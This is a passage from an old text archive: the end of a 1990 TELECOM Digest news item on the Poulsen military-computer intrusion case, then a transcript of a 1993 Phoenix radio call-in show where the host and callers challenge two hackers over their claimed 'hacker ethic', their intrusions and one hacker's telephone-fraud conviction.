idol. With his friends, Kevin got Sheedy's number and address and
stalked her through the phone lines and surveyed her house in the Los
Angeles area, Randol said.

------------------------------

Date: 27 Jan 90 15:11:47 EST (Sat)
From: josephl@wb3ffv.wb3ffv.AMPR.ORG (Joseph Liu)
To: chinet!patrick
Subject: Two Surrender in Military Intrusion Case; Third Sought


Hello Patrick:

I think this article might be of interest to Digest readers. 

TWO SURRENDER IN MILITARY COMPUTER INTRUSION CASE; THIRD SOUGHT

     Two of three men accused of conspiring to break into a military
computer network and a phone system surrendered to authorities this
week. Remaining at large, though, is the alleged ringleader,
24-year-old Kevin L. Poulsen.

     As reported last week the three are all either current or former
employees of Sun Microsystems and SRI International consulting firm.
They were indicted by a federal grand jury on charges of invading or
trying to invade Pacific Bell Telephone and U.S. Army computers.

     In San Jose, Calif., this week, 25-year-old Mark K. Lottor and
Robert E.  Gilligan, 31, surrendered before U.S. District Court
Magistrate Patricia Trumbull. They entered innocent pleas, were
released on $100,000 bond each and were ordered to return to court
next week.

     The Associated Press says Lottor faces five courts and Gilligan
six in the government's 19-count indictment. The prosecutors contend a
scheme existed to steal military secrets and phone numbers from the
FBI investigation of former Philippine President Ferdinand Marcos.

     Federal officials contend the latest computer tampering began in
1985 and started to fall apart in February 1988 when police found
telephone equipment belonging to Pacific Bell in a storage locker
rented by Poulsen.

     The search continues for Poulsen, charged in 16 counts. He faces
up to 37 years in prison if convicted. The other two suspects face 20
years each if found guilty of all charges.

     AP reports Poulsen is believed to have fled to Los Angeles after
leaving a job with Sun. Incidentally, Poulsen also was an unindicted
co-conspirator in the 1984 computer break-in case at the University of
California at Los Angeles.  His friend, Ron Austin, was convicted on
charges related to the break-in. The wire service quotes authorities
as saying that at the time Poulsen used the computer handle "Dark
Dante."

------------------------------

End of TELECOM Digest Special: Kevin Poulsen
*****************************

kfyi-593.pt1                                                                                        000666  000000  000000  00000036074 05400446102 011143  0                                                                                                    ustar 00                                                                000000  000000                                                                                                                                                                         KFYI Phoenix, 910 AM
Kim Kommando Show 5-22-93
Segment One

Cast of Speakers:
KK: Kim Kommando
MR: Mind Rape
MY: Mercury
B : Bruce
--: Any caller
A : Announcer

Intro Music...

A : And now another hour of Arizona's most exciting news/talk radio 
    continues as KFYI shows you how to take command of your computer. 
    Now here's KFYI's PC expert and syndicated columnist Kim Kommando.
KK: And here we are. We're gonna be taking command of that computer for
    the next two hours. 6 to 8 PM here on 910 KFYI. Any computer question.
    All you gotta do is pick up the phone and dial now. You are gonna be
    renting the nerds for the next two hours. 258-5394. 258-KFYI. We've got
    two lines open. You don't have to read the manuals. You don't have to 
    ask your friends and neighbors what kind of computer software that, that
    you should buy. Because you what? They may not have the right answer. All 
    you gotta do is pick up the phone and give us a call. 258-5394. 258-KFYI.
    Any computer question. And I guarantee you that we'll know the answer or
    do our best to have the right answer for you. And again, we have one line
    open. 258-5394. And joining us today, two very special guests. Well, Bruce
    is here. Bruce is our, our techno-extrodinaire. He knows the bits and 
    bytes of the universe.
B : Personally.
KK: Personally knows them. He can call them by name. But our special guests. 
    Their names. The first one is Mind Rape. Yes, his mother and father are 
    proud of that name, but I don't think that they gave it to him. And then
    we also have Merc. Short for Mercury. And these two gentleman, what, what
    they do. Now there's good uses of technology. And this is the stuff like 
    word processing. And you can write a book. You can help your business 
    grow. You can make yourself more productive. You can give your kids an
    advantage for the future. And those are the good uses of technology.
    And, if we think about it, we got computer chips in our washer machines,
    in our toasters, in our coffee machines. Just about any place you look 
    around there is a computer chip somewhere lurking in the mist. But what 
    about the bad things that technology does? I mean, Merc, we got a phone 
    call about a, probably about 6 months ago now, a guy called in and said,
    "You know Kim, computers are terrible. My father used to work, believe it
    or not, at a shoe factory." I remember the caller. "At a shoe factory and
    computers displaced everybody there. My father is 60 years old and he has
    no job. No money. And I have to support him. And I don't think what you 
    are doing is a service by, by having a computer show." Well I said thank
    you very much and, you know, on to the next caller please. Thank you.
    Well, some other bad uses of technology is quote unquote hacking. And 
    what hacking is is when you, when you use your computer to do unscrupulous
    things, in my opinion. And certainly hacking is not what a lot of people 
    would call the best  way to use of technology. But yet, the hackers exist.
    They've been around. You've seen the headlines. You know, "Billions Stolen
    From a Bank." You know, and normally we're talking about, about people 
    that aren't so, you know that they're not old, folks, you know normally 
    they're in their teens and they get a little bored and need something to
    do, in my opinion. And, and hence comes the word hacking. And so joining
    us, we have a, we have two gentlemen here. The first one's Mind Rape, 
    again. The second one's Merc. And gentleman, I'd like to to say thanks 
    for coming down. And, ah, I guess I am just gonna start out by asking you 
    what is, what is the worst thing that you have done. And I am going
    to pose the question to you Mind Rape. And ah, now you're a married man. 
    I see a ring on your finger. Ok. You have a family?
MR: Ah, Yes.
KK: Ok. And ah, ah, you have any kids? You got kids?
MR. Yes
KK: Ok. How old are you kids?
MR. That's not really important here.
KK: Ok. Well, I know, I just want to establish the fact that you are a family
    man. You got values. You got morals.You're married. You're not just 
    fooling around, you know, and, and, so on and so forth. What do you think
    is the worst thing that you've done by hacking?
MR: Ummm, as in worst as in the best accomplishment that I have done?
KK: Well I don't if I would, I guess, I don't know if, if we would call it an
    accomplishment, but if you want to use the word accomplishment, I 
    understand. But, what do you think it is, and I'll use your words, what is
    your best accomplishment that you have done with a computer.
MR: Ah, I would have to say, taking control over a major phone
    company system.
KK: Ok. So you took control of the phone system. What does that mean when,
    when you say you took control.
MR:  We accessed their systems and, umm, we were full, we had full system 
     privledges, we controlled everything. We were God.
KK: Ok. You were God. quote unquote?
MR: Uhuh.
KK: Ok. And, and, you accessed their systems. Could fool around with the
    billing? I mean, Could you make free long distance calls? Could you...
MR: We could have. That wasn't the point.
KK: What was the point?
MR: Just to see if we could do it.
KK: Ok. Then once you got in there what'd you do? Did you do anything malicious?
MR: No! No. No, that is, we do not, Merc and I do not believe in that. 
    That is totally unethical.
KK: So its kinda like a game then? To see if you can get in?
MR: Ah...Yeah...
MY: No...
MR: You wouldn't call it a game?
MY: No, its more of a way of life. A philosophy.
KK: Ok. So this is a philosophy. Now that's an interesting word to use...
    its a philosophy.
MY: It is.
KK: Ah...Explain that.
MY: Well, first before I can explain it, I would like to readdress your 
    previous definition of hackers. A hacker isn't necessarily someone 
    interested in breaking the law. I don't think you can build a case 
    that someone who broke the law is a hacker. They might have used hacking
    skills to accomplish their goal, but that does make them a hacker in our
    guild.
KK: Ok. So you don't think hacking is bad.
MR: No.
MY: I think their are positive uses of hacking skills.
KK: Ok. And, well, there are, you know, positive uses of guns. I mean.
MY: That's correct. That's a good point.
KK: There's positive uses of a lot of things. So you, so you don't think 
    this is a bad thing.
MY: I think there can be negative things that hackers can do. I think there 
    can be positive things. I think you have decide, ah, what you plan on 
    doing with your skills, and just like any skilled person, whether its 
    someone's who interested in electronics or chemical engineering or 
    whatever it is, you use your skill for negative or dishonest or criminal...
KK: But what do you get, what do you gain from getting into...
MY: You gain...I'm glad you're asking me that finally. Ummm...
KK: Finally? We've only been on the air a couple minutes. <laughter>
MY: You gain...You gain knowledge.
KK: You gain knowledge.
MY: There's a great amount of learning.
KK: What about reading an encyclopedia? I mean...
MR: Oh yeah!
KK: Reading a book?
MY: We do that too. Library...
MR: That's our...
MY: That's a hacker's heaven.
MR: That's our main resource. That's where we originally started at.
KK: Ok. If, you know, if you're out there listening and you have an opinion 
    about hackers or maybe you're a hacker, we loved to hear from you. I got 
    one line open. 258-5394. 258-KFYI. And especially if, you know, you have 
    an opinion about hackers, if you think its wrong, or, err, or maybe that 
    something has happened to you, or somebody has gotten into your computer
    and has done something that you don't think is ok, well, I want to hear 
    from you. 258-5394. 258-KFYI. And so, you know, so you consider this a 
    knowledge bank. I mean, you know, I guess I'm kinda sitting here saying
    I use a computer all the time. Ok.
MR: Uhuh.
MY: Uhuh.
KK: When you guys sat down, you said, gosh, you know, we're surprised to 
    see a woman.
MR: <laughs>
KK: Ok, you expected some... What did you expect?
MR: Well, most woman aren't really interested in, ah, computers. 
KK: Ok.
MR: There's nothing wrong with that. Ok, I mean, nothing wrong with women 
    using computers. But its a shame that not a lot of them take advantage 
    of it.
KK: Yeah, I mean computers are really cool. I mean they really are.
MR: Yeah.
KK: There's a lot of stuff you can do with them, and they are really just 
    wonderful. So tell me about the library.
MR: Ah, like we mentioned before, the library is our best resource. That's 
    where we originally started at.
MY: A plethora of information at the library.
KK: Ok, Give some examples.
MY: There are books at the library explaining how phone switching systems 
    work - telephony, computer science, programming manuals.
KK: Ok, so this isn't just dialing into, ah, lets just say, the phone system 
    computer.
MY: Uhuh.
KK: This isn't just dialing in. 
MY: Right.
KK: Now we gotta do some research before we can get in.
MY: Right. In fact, I've said in the past that if someone made real movie 
    about what hackers do it would be the most boring movie ever made.
MR: Yeah.
KK: Ok. I mean. I mean. Do guys have like a...I'm sorry I'm going to ask you
    this. But, do you have a life? I mean, you're married, you got some kids.
    I mean don't ya, I mean isn't there a better use of your time? I mean...
MY: Well, do you have a life if you are doing what you want to do with your 
    life?
KK: Ok. Alright, I don't what to say other than I think I could find a better
    use for my time. Lets go right to the phones. Lets go to John in Phoenix.
    John, you're on 910 KFYI.
--: <dead air>
KK: Hello John?
--: Yes!
KK: You're on the air John.
--: Oh. Ok.
KK: Welcome to the show.
--: Thank you very much. Ah, concerning, ah, I was listening to the 
    conversation when you first came on discussing with that gentleman,
    ah, concerning hacking.
KK: Mind Rape and Mercury are their names. Yes.
--: Ok
KK: Mind Rape.
--: Ok. I went to school and took quite a bit on computer courses for 
    programming and operation. And, ah, in hacking, I've found, that that's 
    one of the more...there's a lot of education involved in that. You getting
    into...its just like getting into a new library. You go into another 
    system...
KK: Now John...
--: A lot of people that hack aren't in there to cause damage. Just to see and
    look.
KK: John, have you hacked around? Have you done it?
--: I have hacked before.
KK: Ok. And why did you do it?
--: Just to see if it could be done. Just to take a look. Just like seeing an
    interesting book, you pick it up and you start reading it.
KK: Ok. So its really just something that you feel that, ah, its a challenge 
    for ya. Its something that you'd just like to try. Kinda like trying to 
    ride a motorcycle. I mean, I'd like to try a lot of things. I'd like to 
    try and paint, I mean. So you think that trying to get into somebodies 
    computer is, is a worthwhile venture?
--: It is to a certain degree as long as the ethics involved in it...as long
    as their is no mischief involved, any damage. I've hacked into IBM systems
    before. And, ah, that's how I learned how full network systems run. I got
    my first job...
KK: You know, John, you could read a book on networking and learn.
--: There's reading a book and doing it are two different things. Like reading
    a book on how to drive a car does not teach you how to drive a car.
KK: You know, John, I appreciate you calling in and sharing your success story
    with hacking, but I still gotta stand by that, you know, there's a privacy
    thing here. You know, Merc you're wearing shirt that says "I Love The Feds".
MY: That's sarcasm.
KK: <laughs>
MY: One thing that the caller said is people's system. Now that kind of leaves 
    a feeling of individuality. Umm...its true, when you hacking into someone's
    system you're not looking at someone's face. Or, or ah, you're connecting 
    to a system of an unknown individual, which is in a lot of cases. So I'd 
    like to start off by saying I'm not interested in hacking someone's 
    personal long distance phone codes. Or I'm not interested in stealing 
    service from the phone company. And I'd even like to state there are legal
    ways to call long distance for free. Just to make a point, believe it or 
    not, its true.
KK: Ok. It's legal?
MY: Right. There are legal ways to call long distance for free.
KK: Well,I don't think we need to go through that here, now.
??: <laughs>
KK: Merc, I have to ask you why is the Attorney General knocking on your door?
MY: Oh. Oh, that was a long time ago.
KK: Ok.
MY: Well, we were stumbling...stumbled across a system that...well, we didn't 
    know who owned it. It ended up being owned by the State Department of 
    Revenue. 
KK: <laughs>
MY: And they're a little touchy about accessing their systems. And, ah, its a 
    shame that it had such poor security.
MR: Yeah. Imagine if someone else got into it.
MY: That wasn't...that didn't have the ethics that we have.
KK: See, I don't...see I don't...you know, its a shame. You know, its 
    a...there's a lot of things that there's a shame out of.
??: Uhuh. <probably MY>
KK: I mean, it's a shame if I'm walking down the street somewhere and I get 
    mugged because I wasn't looking around. Ok?
??: Uhuh. <probably MY>
KK: I don't know if I...I guess, I'm taking a real hard stance on this because
    I think that what you're doing is, you're, ah, I mean technology is so 
    great, that, and its so powerful that what your doing is showing the bad 
    side of technology, and that's not good.
MY: What, what...
KK: I mean, you know...I mean, you know, you're outlaws.
MY: What, what bad things have happened by ethical hackers? Not a lot of,
    not a lot of bad things.
MR: Actually good things have happened.
MY: There have been a lot of good things. Would you rather that it, that if you
    were a student at a university, would you rather your system was secured by
    someone who used to be a hacker and understood the security holes and flaws,
    or would rather your system was secured by someone who just graduated, just
    got out of school, was green behind the thumbs, so to speak?
KK: Well I don't know if the universities will actually do that. There's, you 
    know, there's several programs on the market. We've got one line open. If 
    you want to join in, 258-5394. 258-KFYI. Just because we're talking about 
    hackers doesn't mean you have to. All you gotta do is pick up the phone 
    and give us a call. Let's go to Scott in Tempe. Scott, you're on 910 KFYI.

<Scott was having a problem with his new modem. I edited out his waste of time>
<as well as the commercial break that immediately followed this call.          >

<This ends the segment one, the first half hour of the program.                >
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    kfyi-593.pt2                                                                                        000666  000000  000000  00000063210 05401755474 011154  0                                                                                                    ustar 00                                                                000000  000000                                                                                                                                                                         KFYI Phoenix, 910 AM
Kim Kommando Show 5-22-93
Segment Two

Cast of Speakers:
KK: Kim Kommando
MR: Mind Rape
MY: Mercury
B : Bruce
--: Any caller
A : Announcer

Intro music 1: Each time I see a little girl, of 5 or 6 or 7, I can't resist 
a joyous urge, to smile and say, thank heaven for little girls...
Intro music 2: Eric Clapton

KK: And thank heaven for those little girls. Cause when those little girls 
    grow up they do computer shows. What do you think? I'm Kim Kommando. 
    We're talking about hacking. We're answering all those computer questions
    here today. We got one line open. 258-5394. 258-KFYI. Let's go to Bob in 
    Tempe. Your on 910 KFYI, Bob. <Zaphod>
--: Hi. How are you?
KK: Great.
--: I was wondering, ummm, they keep talking about this hacker ethic and
    I was kinda wondering what that was.
KK: Sounds like an oxymoron, doesn't it, Bob?
--: Well, not really. I mean, you can have lots of ethics I suppose you know, 
    say ah, there can be a difference I guess between destroying things and ah
    just wanting to see what's going on, curiosity.
KK: Ok, well, you...you guys answer that question.
MY: I'd like to answer that. First of all, we're not the ones that invented 
    the term Hacker's Ethic. In fact, that's an old, ah, term. That's been 
    around since...
MR: Since the 60's.
MY: Since the 60's...since it originated at MIT. Ummm, if you would like to 
    explore of the philosophy of the Hacker's Ethic ah, I would say read a 
    book called "Hacker's" by Steven Levy. That's...
KK: Which brings up, which brings up a good point. Ok? And ah, and, Bob, I'm
    gonna ask ya...you know, your welcome, your still on the air so you can 
    join in. Ok?
--: Ok.
KK: Ah, what about going to school?
MR: Well, I have attended school.
KK: What about...I mean, you know, certainly there's a lot of knowledge you 
    can gain by going to school.
MR: Well one of the problems is I did attend ASU for awhile. And, umm, and 
    the classes were extremely baby-fied.
KK: Did you graduate?
MR: Phht...no...
KK: No. Ok.
MR: I...The teachers were idiotic. They treat you like you know nothing. Which
    is understandable, ok? But I even tried to get into higher end courses 
    that they require like master degrees and stuff.
KK: Ok.
MR: And no. You have to take these courses. And I'm trying to tell them, I 
    know so, I know so much and I'm even willing to test out of these courses.
    They stilled refused. So I tried.
MY: I can second that. I've called up ASU in the past and asked to take some 
    advanced classes. Classes in which I probably could have taught their 
    instructors a thing or two about. And they insisted that I complete their
    MBA program before I go on to that class.
KK: Yeah, you know, but that's, that's a ah, that's a sign of youth.
??: Well...
KK: And I'm not that much older than you guys sitting here
MR: Uhuh.
KK: You look like you're in their twenties. I'm in my twenties.
MY: I would like to state I do have a degree in computer science. An 
    associates degree. But I didn't continue on to get the masters or the 
    bachelors.
KK: Ok. Ah, because, I, I have a bachelors in computers.
MR: Uhuh.
KK: I mean, I went through ASU. And, you know, there's a point in out lives 
    when we think we know everything.
MR: No. We don't. That's why we wanted to go to school. Because we wanted to 
    learn more. But as it turns out their sitting there telling me how to 
    format a disk, ok, when I already knew how to do, done this since I was 9
    years old.
KK: Ok, well, I can't believe that. You know, what about DeVry? What about 
    another school? I mean, certainly there are others ways...
MR: Its not just the school itself, its the teachers also.
MY: I guess the point we are trying to make is we've learned more on our own...
MR: Yeah.
MY: ...than we ever could have done going to a school.
KK: Now you're telling me that nothing...that you've never done anything bad,
    quote unquote. You've never, you've never used the computer, or the 
    hacker...
MY: To steal I'd say...
KK: To steal. 
MY: Right.
KK: Ok. Have you disrupted somebody's files to make them look a little crazy.
    Ah, just, just fooling around....I mean you weren't doing anything 
    malicious.
MR: Umm...no one is perfect. No one's perfect
MY: I've done that to other hackers to just play jokes and stuff though.
KK: But you know sometimes...
MY: But not to students to confuse them.
KK: You could have gotten into the Bell system, the phone company system.
MR: Uhuh.
MY: Could have.
KK: And ah, and maybe disrupted some of their files.
MY: Eh...Right...
KK: You know, and we're talking about a billion dollar a year company.
MY: I guess the mentality behind that is, is you could go out and buy a gun 
    to shoot someone but you don't because you have ah, ethics or I suppose 
    you have a conscience and...so we all have the free agency, the capacity
    to do anything be we choose not to because of free will.
KK: Ok. Ok, well, there's another term associated with hackers called 
    cyberpunks.
MR: No.
MY: No, we hate that term.
MR: No. No, I am not a cyberpunk
MY: It's new age. It's trendy. It's...
MR: It's a fashion statement that's what it is.
KK: Ok, well, a pocket protector is a fashion statement too, but, I mean...
MR: Well, we don't seem to be looking like we're wearing one <laughs>
KK: No, no pocket protectors there. Let's go to...Let's go to Mike in Phoenix.
    You're on 910 KFYI, Mike.
--: Yeah, just some general questions for these hackers. Ummm, found this kinda
    of interesting. I've been messing around with computers now for maybe about
    3 years. Been messing around mainly with Autocad. In other cases I get on 
    my modem and I horse around...just for the ah, bulletin boards services. 
    I've always been curious...how do they gain access. Can they give me some
    ah...
KK: So you want, so you want tips!
--: I'm just curious how they do it.
KK: You want hacker tips.
MY: Maybe he wants to know ways to keep it from happening to him.
--: That's very possible.
MY: Nothing wrong with knowing that.
--: No I'm just curious...
KK: Well it works both ways.
--: ...how do they around codes. How do they get access to the numbers.
KK: That's an interesting question. How do you do it?
MY: Different...different ways. It depends...
KK: Give me an example. Tell me how...
MY: If he's attached a major network, say the Internet or ah, Sprintnet say, 
    then there's already ways to connect to a system without going through a 
    login. There's mail ports, there's finger ports. Ummm...I'm primarily 
    someone who's interested in networks. For someone...
KK: You like networks.
MY: I love networks.
KK: Are they easier?
MR: No.
MY: Easier to hack? No. Because there are so many predecessors before us that
    they are more secure. But there are more ways...more different ways to 
    connect to them.
MR: You can literally go around the world.
KK: Ok. Explain that. Go around the world.
MR: For example, you can literally go around the world. All the way to Taiwan. 
    Right out of...
MY: I maintain...its not really amazing, its nothing...its no major 
    accomplishment that we made. Its the people who, who run the networks
    that really are the, ah, the great people as far as that accomplishment 
    goes. But, anyone who has, who has any experience working on the Internet
    knows that all you have to do is specify an Internet address and you can 
    immediately connect to any host, connect to any domain.
KK: Ok, and bypass any, ah, you know with Internet there are no real charges.
    But what about, like a online service like Compuserve?
MY: Ummm...Well I think...Well this is my opinion, I'm not gonna...I don't 
    want to hurt anyone here, but I think Compuserve...its just a blatant 
    ripoff.
MR: Its basically a joke. That's what it really is.
MY: There's...its a self contained system they have mail gateways on it to 
    the Internet. But what can you get on there that you...
KK: But there's, But there's a lot...
MY: ...can't get for free.
KK: Well, yeah. But there's, But there's a lot on there that you can get.
    Ok. Cause I use Compuserve all the time. But before we get into it...Mike,
    do you...do you think its ok to hack?
--: Do I think its ok to hack? 
KK: Yeah.
--: It depends what you're getting on to.
KK: Ok.
--: Ummm....I'm sure there lots of stuff you can get onto where you can't 
    create damage if you just do it for entertainment.
KK: Ok.
--: Then that would be ok. I think if maybe you get onto something, for 
    example, umm, a police service of some sort you could cause some damage
    and, ah, hurt other people unknowingly. Ummm...<garbled - she talks over
    him>
KK: But, but, you know, but the bottom line is if you think you're just...you 
    think that if you're at home, ok, you got a computer and a phone line.
    And, ah, you know, its a little slow around the household, you got...
    you're bored. And you're curious to see if you could do it. You think 
    its ok to go into somebody else's computer and take a look. Its kinda, 
    you know, cause sometimes computers are like your homes. I mean, there's 
    so much personal information on a computer.
--: I know a little about hacking. Although I haven't really gotten into it. 
    I know enough if you really want these boys out, there are ways to keep 
    them out.
MY: That's true. I would....I would say that most of systems that get hacked
    are systems that where the administrator never cared.
--: Yeah.
MY: And didn't take the time, the small amount of time it would have taken to
    secure the system.
--: But tell me about the networking. How do you get ummm. <laughs> How do you
    find the numbers for these things. How do you get access to these things?
MY: There are public Internet dialups.
--: Really?
MY: For instance, there's a new place in the valley that just ah, free public
    Internet access. And I guess I can't say that because you can't name names
    on the air, so I won't. But, ummm, you can access the Internet if, if you 
    are at a major university
KK: Ok.
MY: So...
KK: So, I mean, so if you know if you have access to Internet you're telling 
    me that I can go...
MY: Or government or military sites that are all connected to the Internet too.
KK: Ok. And so and its not very difficult to get in there.
MY: Oh, I wouldn't say that. But I'd, I'd say there are times when you find 
    systems that aren't secure. And...
KK: How long does it take you to get into one? On the average?
MR: It depends on the security of the system...
KK: Let's say just the average...
MY: On the average, how many times in a day, could I hack into...how many 
    sites could I hack into in a day, would ya say?
KK: Yeah.
MY: At the most, I would say four sites on the Internet.
KK: 4 sites in an 8 hour day?
MY: Ahh...well, maybe I didn't spend 8 hours doing it constant...I mean, 
    sometimes I'm not sitting there doing it, maybe I have a program doing
    it for me.
KK: Oh, so, so you can write programs. Well, I want to know about that. <laughs>
    This is interesting. I, I...this is interesting. We got...Mike, thanks for
    the call. We've got one line open. If you want to join in, 258-3954. 
    258-KFYI. I'm Kim Kommando on 910 KFYI.

<commercial break>

Intro Music: ACDC

KK: We're back answering all those computer questions here on 910 KFYI.
    Let's go right back to the phones. Let's go to Sharon in Phoenix. 
    You're on 910 KFYI, Sharon.
--: Hi.
KK: Hi.
--: Ah, I didn't know your boys were gonna be on and I got a DOS question and a
    comment.
KK: Oh no, that's cool. We'll take it. But no, let's hear your comment.
MY: Maybe we can answer it I don't know.
--: Yes.
KK: Hey, well, you know, give me a break here! You know, I do this every week 
    without ya. Ok, I mean... <laughs>
MY: Ok, I'm not trying to take your job, go ahead. <laughs>
MR: We want her job, man. <laughs>
--: Tell your boys to cool it.
KK: Cool it over there. Listen to Sharon.
--: <laughs> I think that what they're doing is akin to being in a 
    neighborhood, you know, that they're familiar with and looking in the 
    living room window or dining room window providing they don't...
KK: So they're peepers!
--: Right. Now if they open the files and actually read them, then they are
    looking in the bedroom window and then it changes a little bit.
??: <laughs>
KK: You know what, I gotta tell ya, the guys are getting excited here. You 
    say bedroom window and they're get excited.
--: Right. Exactly.
KK: You know, that's a good point Sharon.
--: Now what they're doing, if they tell somebody that there was something
    terribly illegal going on in that living room and that it should be fixed, 
    I'd say harmless fun, and thank you, you know, for letting us know. If 
    they let the security people know. On the other hand, if they keep going 
    in and keep looking then it isn't harmless fun anymore, then its invasion
    of privacy
KK: I, I agree with you Sharon. I think it is an invasion of privacy.
--: But on the other hand, kids will be kids and, you know when I grew up, they
    used to tip over the outhouse and they used to dump things. And...you know
    what I'm saying.
KK: Yeah. Yeah, you're right.
--: I don't mind, I really don't mind them doing it. And I certainly don't 
    want to see them go to jail for 20 years because they looked.
KK: But if, but if they look inside, and...
--: If they reach in through the screen and take anything...
KK: They should be put away.
--: Put them away.
MY: I...
KK: Put them away.
MY: I have a statement to say about that. 
KK: Go ahead, Merc.
MY: I mean, I understand the angle she's trying to take with this. And I agree
    when you're young, you do things, childish things, like tip over outhouses
    though I never have had the privledge myself. But all that...
KK: Get to the point, Merc. Come on.
MY: We take hacking very seriously, its not a childish type of thing. We have 
    reasons for what we do, and we also have things that motivate us, and, 
    umm...
KK: We're...We're going to talk about those motivations. But let's here that 
    DOS question first, Sharon.

<editted out Sharon's DOS 6.0 - the usual upgrade problems>

KK: ... And I appreciate you calling in, because you know what, Sharon, you
    brought up a great point, that, it is like you're looking in someone's 
    home ok, when you're hacking, ok because, you know, you're looking inside
    computers. Now, you know, Mind Rape. Nice name. <laughs> Bye the way...
    nice name...
MR: Its nothing sexual.
KK: Well, Mind...Rape...you know, I mean, you have to come up with a better one.
    But anyway, you look like a nice guy. What are you running around with a 
    name called Mind Rape for? I mean, its ah...
MR: Well, basically, it ah umm...phttt...it can be taken several ways. One, it
    describes who I am and how I see things. So basically my mind itself has 
    been raped.
KK: Now you consider yourself ethical?
MR: Pardon me?
KK: You consider...err...both you guys. You think you're ethical.
MY: We like to be. We like to be considered ethical. Yes.
MR: Yes.
MY: We believe we have ethics.
KK: Ok, now, now do you know what the definition of ethics is? I mean, can 
    you...can you tell me what the definition of ethics is right now?
MY: I didn't look at it in Webster before I came, so I probably couldn't give
    you his version of it. But ours is maintaining our own level of, of
    professionality in what we do and not...we're not out to hurt or...
MR: Profit...
MY: ...profit...we're not in it for profit and...
KK: We're going to talk about what the definition of ethics is, when we come 
    back. I'm Kim Kommando of 910 KFYI.

<commercial break>

Intro Music: Van Halen

KK: We're back answering all those computer questions. We're talking about the
    ethics of computing. The ethics of hacking not computing. We're here with 
    Mind Rape and Mercury, or short for, Merc. And we're talking about what's
    all happening and how they are able to get inside the computers. And 
    before we went to that break, I asked you the definition of ethics. Ok, 
    Merc? And you, you told me during the break that you wanted to work on it,
    you know, that, that you didn't give the right definition. Ok, so you tell
    me what it is.
MY: <muffled> again...again...<clear> Something wrong with the microphone. 
    <laughs>
KK: I know, go ahead shoot. Your on now.
MY: Short in it. Again, I'm not...I'm not...
KK: High tech place...I'm not the person who invented the term Hacker's Ethic
    But I know what it means as far as what I do and what I shouldn't do. And
    things that I shouldn't do is...well, ah...for any reason, for reasons of
    revenge or what don't destroy systems. Don't get involved for personal gain.
    Just be in it for the learning experience.
KK: Ok, for the experience. That's, that's what ethics means to Merc. Ok, lets
    go to ah, lets go to Bob in Scottsdale. Err...lets go to Gail in Phoenix
    Your on 910 KFYI, Gail.
??: Hi Gail.
KK: Gail?
--: Yes.
KK: You're on the air.
--: I'd like to ask Mind Rape, given his view of ethics, what ah, he was
    prosecuted for and what was the outcome of his case.
KK: Good question, Gail. Go ahead.
MR: Is your name by any chance Gail Thackeray?
KK: Now we don't give out last names here, its not important. Let's, let's go
    ahead Mind Rape. You're blushing a little bit. Why are you doing that?
MR: Well, I have been busted before.
KK: Ok.
MR: I have been prosecuted for telephone abuse.
KK: Telephone Abuse. Gail?
--: Isn't that theft?
KK: Yes. That's theft. Ok, now you got prosecuted for that. But you, you've 
    been telling me, here, for the last forty minutes that you don't do 
    anything wrong. That, that, you know...
MR: No, that was. That right there...
KK: Yeah but...
MR: It takes, sometimes it does take a bust to really show me what's...what 
    isn't right.
KK: But Mind Rape, for the last forty minutes, you, or so, you've been on the
    air. You've sat here and said, Kim... And you've said it to us, the 
    listeners, ok, I do it for the experience. I do it because I want to learn.
    Because I tried to go to ASU and I couldn't learn, you know, I couldn't 
    learn a damn thing. I didn't know anything...I couldn't learn anything
    because I already knew how to format a hard disk. But now, but now you're 
    telling me...now...now... You lied to us...
MR: No. No. I, as I mentioned before, no one's perfect either. I mentioned that
    at the very beginning of the show. No...not...
KK: Ok, well tell us why you got prosecuted.
MR: Ah, I was basically doing telephone fraud, which is abusing long distance
    service. Making free phone calls.
--: Free to whom? Someone paid your bill.
KK: Yeah. Us the consumers paid your bill eventually. I paid your bill Mind 
    Rape. Who'd you call?
MR: <laughs>
KK: How come I didn't get the benefit of the phone call?
MR: Well see, I don't have the resources to learn. Ok. I would go to ASU, I 
    would go to Devry. But one of the things is, I don't have the money. ok...
    And if there was...
KK: Oh my...get out of here...
MR: No seriously, if there were teachers and stuff out there, that willing to
    work with me, in such a way...
KK: No, I want to know why you were prosecuted now.
MR: Why I got prosecuted? For abusing telephone service and stuff.
KK: Ok, so how did you get nailed. ANd what happened to you? Did you go to jail?
    Did you get a fine?
MR: No, I'm, ah, currently serving probation. 
KK: Ok.
MR: Which is, you know, decent of them to allow me to do, to do that.
KK: Gail, you got a comment?
--: Yes. If he had a burning desire to learn about high performance race cars,
    no one would forgive him for stealing them and joyriding in them and taking
    them away from their owners. But he feels that he has a right to do the 
    same thing with computers.
MR: No, the telephone abuse, I would have to say, it was wrong. Ok. That was 
    my mistake.
--: What about exploring other people's computers without their permission or
    knowledge? And not caring about what happens to the computer while your 
    exploring?
MY: Well, again, your using the word people's. I mean, we're not interested
    in individual's systems.
KK: What they're saying, Gail, what they've been saying here, is...
MY: What about a government system that maintains list of information on 
    private citizens?
KK: Gail. But Gail, Gail, they're denying going into people's computers. Ok?
    Alright, They're saying they only go into companies so its ok.
--: Well...
KK: Now, I don't, I don't agree with them. I agree with you. I think your 100%
    right.
MR: We're not out there to steal information. Ok? We're out there to further 
    what we know. And some of the tactics, some of the tactics we have done...
--: You're out there to explore what interests you. And you don't care system 
    it is that you're on. And you don't care what happens to the system that 
    you are exploring. Because, when you explore it, you cause unforeseen 
    problems. And you're there to explore whether that happens or not. And you
    don't really care, do ya?
MR: Would you rather have me hack into a government site, or some KGB agent 
    hack into a government site?
--: I'd rather that nobody hacked into it. But I can't accept...
MR: But it happens...it happens...
--: ...the KGB's desire to do it as an excuse for your willingness
    to cause harm.
MR: Ehem...
MY: Back to the ethics thing, though, I... 
KK: No. We're gonna, we're gonna talk about the ethics thing...
MY: I would like to say though, as far as breaking into systems, that
    every time...
KK: Merc, I gotta put you...
MY: Go ahead.
KK: We're going to talk about the ethics thing. Because, you know...and I'm 
    gonna read you the definition of ethics, ok? And I'm gonna tell ya what 
    ethics is. Or what Webster's says ethics is. And what I think as a moral 
    person, with a value system, that pays taxes, that abides by the law, 
    what we think about ethics. What's important to us. I'm Kim Kommando here 
    on 910 KFYI.

<commercial break>

Intro Music: George Thorogood

KK: And we're back answering all those computer questions. We're talking about
    hackers. We've got one line open. 258-5394. 258-KFYI. And I'm gonna read 
    you, Mind Rape, Merc. I'm gonna read you what Webster's here...I'm gonna 
    look it up, Webster's Encyclopedic Unabridged Dictionary. Its a big, a big
    red book. What they say ethics is. Ethics is a noun. The body of moral 
